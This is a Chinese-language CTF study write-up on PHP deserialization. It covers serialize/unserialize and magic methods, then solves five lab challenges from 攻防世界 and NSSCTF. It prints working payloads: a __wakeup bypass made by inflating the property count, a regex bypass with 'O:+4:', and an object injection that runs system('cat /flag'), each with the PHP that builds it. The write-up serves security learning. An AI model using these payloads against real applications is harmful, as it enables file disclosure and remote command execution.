今日练习题目是PHP反序列化,也学习一下说明是序列化和反序列化
1.PHP序列化
序列化是指将数据结构或对象转换为可传输或可储存的格式的过程。这通常需要将数据转换为字节流或者其他编码格式,以便在不同系统和应用程序之间进行传输或存储
在PHP中,可以使用serialize()函数将对象序列化为字符串,然后进行存储或者传输
2.PHP反序列化
反序列化就是将序列化后的数据转换为原来的对象,数据结构,变量的过程
在PHP中,可以使用unserialize()函数将序列化后的字符串转化为原来的对象或数据
3.魔法函数
在PHP中,魔法函数是指的是特定的函数,名称以两个下划线开始命名的
下面是一些常见的魔法函数
__construct :类的构造函数,在对象被创建时自动调用
__destruct :类的析构函数,在对象被销毁时自动调用
__get :当调用一个不存在的属性时自动调用
__set :当给一个不存在的属性赋值时自动调用
__call : 当调用一个不存在的方法时调用
__toString : 当对象被转换为字符串时自动调用
__sleep : 当对象被序列化时自动调用
__wakeup : 当对象被反序列化时自动调用
4.例题
4.1[攻防世界——unserialize3]
看这串代码,显示出来不是一个完整的PHP代码(括号没有完全闭合)
开始分析:
__wakeup()函数,看到这个函数,就会想到反序列化,对于上述代码中的xctf类中,有一个flag变量和__wakeup函数方法,当一个xtcf对象被序列化为字符串后,再次反序列化该字符串(wakeup方法的调用),就会重建该对象(xctf)
题目没有给出序列化,则需要我们自己生成出,然后给code传参
<?php
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}
$a= new xctf();
echo(serialize($a));
?>
//上述代码就可以生成xctf的序列化字符串
序列化输出结果为:O:4:"xctf":1:{s:4:"flag";s:3:"111";}
分析可知,当把序列化结果传参时,执行到wakeup方法就会成功反序列化,则打印“bad request” ,无法得到flag
所以就得绕过这个反序列化的操作,就是不能正确的将字符串反序列化
接下来就分析一下序列化结果
O:4:"xctf":1:{s:4:"flag";s:3:"111";}
O:表示被序列化的是一个对象
4:表示对象名 xctf 有4个字符
"xctf":表示对象的名称为 xctf
1:表示该对象只有一个属性
{}:表示该对象的属性列表为空
s:表示属性类型为字符串
4:表示属性名 flag 有4个字符
"flag":表示属性名为 flag
s:表示属性类型为字符串
3:表示属性值 111 有3个字符
"111":表示属性值为 111
这里的漏洞就是修改对象属性的个数,因为当序列化中的属性个数比实际代码中的属性个数大时,就不会执行wakeup方法,从而就可以使其报错,出flag!
改为:O:4:"xctf":2:{s:4:"flag";s:3:"111";}
get传参:?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}
这道题顺利解出!
4.2[攻防世界——Web_php_unserialize]
<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
}
}
if (isset($_GET['var'])) {
$var = base64_decode($_GET['var']);
if (preg_match('/[oc]:\d+:/i', $var)) {
die('stop hacking!');
} else {
@unserialize($var);
}
} else {
highlight_file("index.php");
}
上述代码,使用了php反序列化,可以通过$var来控制unserialize()的变量,所以漏洞在反序列化这里
分析源码,可以看出,需要绕过__wakeup()方法和正则匹配,才可以高亮显示出fl4g.php文件
第一部:绕过__wakeup()方法
和上一题一样,先生成出序列化字符串,然后改变里面的属性个数,进行绕过
第二步:绕过正则匹配
就是绕过preg_match('/[oc]:\d+:/i')对照上面的序列化字符串
分析:
[oc]:表示出现字符O或者C
\d+:表示匹配一个或者多个数字(d代表数字)
/i:表示不区分大小写
绕过原理:
1.原正则表达式期望匹配的是 o 或 c 后跟一个冒号,然后是一个或多个数字,再跟一个冒号。
2.在 O:+4: 中,虽然 + 不是一个数字,但 PHP 在处理反序列化时,对于对象长度的解析会将 + 当作数字处理。因为在序列化字符串中,对象的表示形式通常是 O:对象名称长度:对象名称。当使用 + 时,PHP 会将其解释为一个较大的正数。
同时,由于原正则表达式没有考虑 + 符号,所以 O:+4: 不会被 /[oc]:\d+:/i 匹配,从而绕过了该正则表达式的检查。
//后面的执行代码
$a=new Demo('fl4g.php');
$a=serialize($a);
$a=str_replace(':1:',':2:',$a);//绕过反序列化
$a=str_replace('O:4','O:+4',$a);//绕过正则
var_dump($a);//替换后的结果
var_dump(base64_encode($a));//输出base64编码结果
注意:这里有个坑,这里的 file 变量为私有变量,所以序列化之后的字符串开头结尾各有一个空白字符(即%00),字符串长度也比实际长度大 2,如果将序列化结果复制到在线的 base64 网站进行编码可能就会丢掉空白字符,所以这里直接在php 代码里进行编码。类似的还有 protected 类型的变量,序列化之后字符串首部会加上%00*%00。
然后get传参得到flag
4.3[NSSCTF——[SWPUCTF 2022 新生赛]1z_unserialize]
可以看出这是一道序列化题目,利用__destruct()方法在销毁对象时自动调用来执行预定义函数,实现命令注入
分析代码,$a=$this->lt;$a($this->lly);这个意思就是$this->lt赋值给a,$this->lly作为参数传递给代表a的函数,就可以合并为lt(lly)
所以我们就可以通过构造一个恶意的序列化对象,将自定义的函数传递给$lt属性,然后将执行的代码传递给$lly,当对象序列化后再被反序列化,就是对象被销毁的时候,自动调用__destruct()函数,从而执行绕过操作
只需要把a变成system(),把lly变成flag或者cat即可
system(cat/flag);
进行构造代码
<?php
class lyh{
public $url = 'NSSCTF.com';
public $lt="system";
public $lly="cat /flag";
}
$demo = new lyh();
echo serialize($demo);
?>
//运行结果
O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";}
然后进行post传参,得到flag
4.4[NSSCTF——[SWPUCTF 2022 新生赛]ez_ez_unserialize]
分析代码, 有__wakeup()方法,绕过该魔术方法即可
代码中告诉我们,flag在f111111ag.php中,所以创建对象时,把flag文件作为参数传进去
构造
<?php
class X
{
public $x = __FILE__;
function __construct($x)
{
$this->x = $x;
}
function __wakeup()
{
if ($this->x !== __FILE__) {
$this->x = __FILE__;
}
}
function __destruct()
{
highlight_file($this->x);
//flag is in fllllllag.php
}
}
$demo=new X('fllllllag.php');
echo(serialize($demo));
?>
生成:O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}
修改为:O:1:"X":2:{s:1:"x";s:13:"fllllllag.php";}
然后get传参得到flag
4.5[NSSCTF——[SWPUCTF 2022 新生赛]ez_ez_unserialize]
打开题目发现没有东西,然后就下意识查看源码
发现有disallow,就会想到Robots协议,就可以看看robots.txt
robots.txt 文件是一个纯文本文件,用于告诉搜索引擎爬虫哪些 URL 可以访问,哪些不能访问。它主要用于管理爬虫流量,防止服务器被过多的请求压垮
看到有/cl45s.php直接打开,显示php代码
分析代码,可以看到,对象销毁时调用__destrcut()方法,而flag就在这个方法中,只需要满足方法中的if语句 ,就可以得到flag,但是这里面如何改admin和passwd变量的值呢?就需要构造一下,将”admin“赋值给admin,”ctf“赋值给passwd即可,然后进行创建对象,再打印序列化后的字符串
<?php
class wllm{
public $admin="admin";
public $passwd="ctf";
}
$demo=new wllm();
echo(serialize($demo));
?>
O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}
然后get传参,得到flag